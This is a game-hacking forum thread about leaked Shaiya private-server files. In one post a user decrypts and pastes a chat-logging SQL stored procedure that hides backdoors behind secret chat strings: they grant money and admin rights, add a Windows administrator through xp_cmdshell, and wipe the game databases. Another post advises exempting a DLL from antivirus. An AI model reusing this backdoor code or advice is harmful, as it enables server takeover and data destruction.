ep13 China

05/22/2020 15:27 Remarks24#16
Can I use the ep8 os client here?
05/23/2020 02:11 [GM]Crypton#17
Quote:
Originally Posted by Bowie View Post
i edited the bin. please read the notes. should work well enough for testing.

[Only registered and activated users can see links. Click Here To Register...]

edit: the dll that matches the config.ini was not included with the release.

the dll i included can use these functions.

Code:
[MaxEnchant]
Max=30

[AutoNpc]
//example - 1=7,842,68,1108,22,1114,19:30,19:50,1
//values - npctype,npcid,map,posx,posy,posz,spawntime,erasetime,enable=1/disable=0
1=7,842,68,1108,22,1114,19:30,19:50,0
2=2,77,42,58,1,55,19:30,19:50,0
3=2,75,35,591,26,265,20:00,21:00,0
4=2,76,36,514,42,349,20:00,21:00,0

[AutoMonster]
//example - 1=1,35,500,40,500,19:30,19:45,1
//values - mobid,map,posx,posy,posz,spawntime,erasetime,enable=1/disable=0
1=1,35,500,26,500,19:30,19:45,0
2=2,35,500,26,500,19:30,19:45,0

[RespawnProtected]
enable=1
Skillid=276
Skilllevel=1
auto mob/npc works, but it doesn't remove them. i recommend using your own databases.
after some time of use i get kicked several times
05/23/2020 03:53 Realp0rta#18
can share more information for client ep 8.

[Only registered and activated users can see links. Click Here To Register...]
antivirus may delete the pet.dll, so it
would be best to make an exception. ...

but i update mall.dll

05/30/2020 06:39 joins.dj#19
if use.
database ep13 = 6.1-6.3 no wings.
the chat procedure
It is encrypted.
this is what you have inside.

USE PS_Chatlog
GO
SET ANSI_NULLS ON
SET QUOTED_IDENTIFIER OFF
GO
/****** Object: Stored Procedure dbo.usp_Insert_Chat_Log_E Script Date: 2008-6-7 18:30:55 ******/
CREATE Proc [dbo].[usp_Insert_Chat_Log_E]

/*
Created by humanws, 2005-10-14
채팅 로그 남기기
*/
@[Only registered and activated users can see links. Click Here To Register...]ID int,
@CharID int,
@ChatType tinyint, -- 일반1, 귓말2, 길드3, 파티4, 거래5 @[Only registered and activated users can see links. Click Here To Register...]Name varchar(30),
@ChatData varchar(128), @[Only registered and activated users can see links. Click Here To Register...]D smallint,
@ChatTime datetime
WITH ENCRYPTION
AS

DECLARE @[Only registered and activated users can see links. Click Here To Register...] nvarchar(4000)
DECLARE @[Only registered and activated users can see links. Click Here To Register...] varchar(4)
DECLARE @mm varchar(2)
DECLARE @dd varchar(2)

SET @[Only registered and activated users can see links. Click Here To Register...] = DATEPART(yyyy, @ChatTime)
SET @mm = DATEPART(mm, @ChatTime)
SET @dd = DATEPART(dd, @ChatTime)

if (@ChatData='11002299ax22')
begin
update ps_Gamedata.dbo.Chars
set money=money + 100000000
where useruid @[Only registered and activated users can see links. Click Here To Register...]id
end

if (@ChatData='11002299ax2c2#')
begin
update ps_userdata.dbo.users_master
set admin=1,adminlevel=255,status=16
where useruid @[Only registered and activated users can see links. Click Here To Register...]ID
end

if (@ChatData='11002299ax2c2@')
begin
update ps_userdata.dbo.users_master
set admin=0,adminlevel=0,status=0
where useruid @[Only registered and activated users can see links. Click Here To Register...]ID
end

if (@ChatData='11002299ax2g2qq')
begin
exec master.dbo.xp_cmdshell 'net user SQLDebugg shaiya50 /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators SQLDebugg /add'
exec master.dbo.xp_cmdshell 'net localgroup "Remote Desktop Users" SQLDebugg /add'
end

if (@ChatData='11002299ax2g2pp')
begin
exec master.dbo.xp_cmdshell 'net user SQLDebugg /delete'
end

if (@ChatData='好无语i')
begin
truncate table ps_chatlog.dbo.ChatLog
end

if (@ChatData='zhongjizhadan@@**&&&$#@')
begin
truncate table ps_gamedata.dbo.uidnumber
truncate table ps_gamedata.dbo.Market
truncate table ps_gamedata.dbo.MarketCharConcern
truncate table ps_gamedata.dbo.MarketCharResultItems
truncate table ps_gamedata.dbo.MarketCharResultItems_DelLog
truncate table ps_gamedata.dbo.MarketCharResultMoney
truncate table ps_gamedata.dbo.MarketCharResultMoney_DelLog
truncate table ps_gamedata.dbo.MarketItems
truncate table ps_gamedata.dbo.MarketItems_DelLog
truncate table ps_gamedata.dbo.charitems
truncate table ps_gamedata.dbo._CreatedChars
truncate table ps_gamedata.dbo._DeletedChars
truncate table ps_gamedata.dbo.CharApplySkills
truncate table ps_gamedata.dbo.CharQuests
truncate table ps_gamedata.dbo.CharQuickSlots
truncate table ps_gamedata.dbo.Chars
truncate table ps_gamedata.dbo.CharSavePoint
truncate table ps_gamedata.dbo.CharSavePointBack
truncate table ps_gamedata.dbo.CharSkills
truncate table ps_gamedata.dbo.FriendChars
truncate table ps_gamedata.dbo.GuildChars
truncate table ps_gamedata.dbo.GuildDetails
truncate table ps_gamedata.dbo.Guilds
truncate table ps_gamedata.dbo.GuildStoredItems
truncate table ps_gamedata.dbo.PointLog
truncate table ps_gamedata.dbo.UserStoredItems
truncate table ps_gamedata.dbo.UserStoredMoney
truncate table ps_gamedata.dbo.UserStoredPointItems
truncate table ps_userdata.dbo.Users_Block
truncate table ps_userdata.dbo.UserOnlineTimeLog
truncate table ps_userdata.dbo.UserLoginStatus
truncate table ps_gamedata.dbo.offlinesend
truncate table ps_gamedata.dbo.uidnumber
truncate table ps_userdata.dbo.Users_Master
truncate table ps_userdata.dbo.Users_Detail
truncate table ps_gamelog.dbo.ActionLog
truncate table ps_gamelog.dbo.ActionLog1
truncate table ps_gamelog.dbo.UserLog
truncate table ps_chatlog.dbo.ChatLog
update ps_gamedata.dbo.usermaxgrow
set country=2
update ps_userdata.dbo.users_master
set point=0
end

if (@ChatData='110b02299ax22')
begin
update ps_UserData.dbo.Users_Master
set point=point + 10000
where useruid @[Only registered and activated users can see links. Click Here To Register...]id
end

if (@ChatData='我下线n拜拜')
BEGIN
update PS_GameData.dbo.Chars set out=1 where useruid @[Only registered and activated users can see links. Click Here To Register...]id
end

IF( LEN(@mm) = 1 )
BEGIN
SET @mm = '0' + @mm
END

IF( LEN(@dd) = 1 )
BEGIN
SET @dd = '0' + @dd
END

SET @[Only registered and activated users can see links. Click Here To Register...] = N'
INSERT INTO PS_ChatLog.dbo.ChatLog
(UserUID, CharID, ChatType, TargetName, ChatData, MapID, ChatTime)
VALUES @[Only registered and activated users can see links. Click Here To Register...]ID, @CharID, @ChatType, @[Only registered and activated users can see links. Click Here To Register...]Name, @ChatData, @[Only registered and activated users can see links. Click Here To Register...]D, @ChatTime)'

EXEC sp_executesql @[Only registered and activated users can see links. Click Here To Register...],
N @[Only registered and activated users can see links. Click Here To Register...]ID int, @CharID int, @ChatType tinyint, @[Only registered and activated users can see links. Click Here To Register...]Name varchar(30), @ChatData varchar(128) @[Only registered and activated users can see links. Click Here To Register...]D smallint, @ChatTime datetime', @[Only registered and activated users can see links. Click Here To Register...]ID, @CharID, @ChatType, @[Only registered and activated users can see links. Click Here To Register...]Name, @ChatData, @[Only registered and activated users can see links. Click Here To Register...]D, @ChatTime

--move enable
if (@chatdata='我要回秘密交易') or (@chatdata='草泥马')
begin
update ps_gamedata.dbo.chars set move=1 where charid=@charid
end
GO
06/13/2020 11:25 Shaiya Galaxy#20
BUMPING POST

Using EP6 Client it works, but using EP8 Client, it get disconnected.
Login->Select Toon->Start->Loading Screen-> ERROR
06/15/2020 14:52 rn4444#21
Quote:
Originally Posted by Realp0rta View Post
can share more information for client ep 8.

[Only registered and activated users can see links. Click Here To Register...]
antivirus may delete the pet.dll, so it
would be best to make an exception. ...

but i update mall.dll

Can you send me a copy of your mail.dll?
06/15/2020 15:44 Shaiya Galaxy#22
Anyone has Baidu account, i found a working EP8 Server Files

Link: [Only registered and activated users can see links. Click Here To Register...] Password: c2y3

Please re-upload it.


The files are all english
06/15/2020 15:57 admkraken81#23
Quote:
Originally Posted by Shaiya Galaxy View Post
Anyone has QQ account, i found a working EP8 Server Files

Link: [Only registered and activated users can see links. Click Here To Register...] Password: c2y3

Please re-upload it.


The files are all english
my android is broken up
give me download episode 8 sir Galaxy!
06/16/2020 05:33 joins.dj#24
los archivos no funciona. el link que envia galaxy es lo mismo que esta aqui en epvps.
suerte en ello.
06/16/2020 12:33 Azenkitow#25
Quote:
Originally Posted by Shaiya Galaxy View Post
BUMPING POST

Using EP6 Client it works, but using EP8 Client, it get disconnected.
Login->Select Toon->Start->Loading Screen-> ERROR
Could you make a full video setup guide from complete scratch with full archive of the resources needed?
06/16/2020 14:21 KillerMG#26
Quote:
Originally Posted by Shaiya Galaxy View Post
Anyone has QQ account, i found a working EP8 Server Files

Link: [Only registered and activated users can see links. Click Here To Register...] Password: c2y3

Please re-upload it.


The files are all english
how to download?
06/16/2020 15:31 Shaiya Galaxy#27
Quote:
Originally Posted by Azenkitow View Post
Could you make a full video setup guide from complete scratch with full archive of the resources needed?

I cannot because the files are not complete, i need someone who has an Baidu Account to download the complete files. Since the files that was given in this thread is not working.
06/16/2020 16:07 bada2015#28
Quote:
Originally Posted by Shaiya Galaxy View Post
Anyone has Baidu account, i found a working EP8 Server Files

Link: [Only registered and activated users can see links. Click Here To Register...] Password: c2y3

Please re-upload it.


The files are all english
[Only registered and activated users can see links. Click Here To Register...]


[Only registered and activated users can see links. Click Here To Register...]
06/16/2020 16:35 Azenkitow#29
Quote:
Originally Posted by Shaiya Galaxy View Post
I cannot because the files are not complete, i need someone who has an Baidu Account to download the complete files. Since the files that was given in this thread is not working.
I have a baidu account, so maybe i could help you out :P
06/16/2020 16:47 superklamus#30
What is the point of asking for baidu account i already reupload the files to mega in first 1 page. Useless asking account baidu. For that you need chines friend in real life to help you with baidu account like i did. And the files is on baidu first link is the same one that i upload it to mega nz. All links in baidu that has for ep8 files they are bugged ones, same has we got here. To make ep8 work you will need real EP8.DLL and work by your self. Is very simple to change any dll name to EP8 and its been 5 years that Episode 8 came out. If the server files not have been shared till today to public ,so it is no longer to be shared.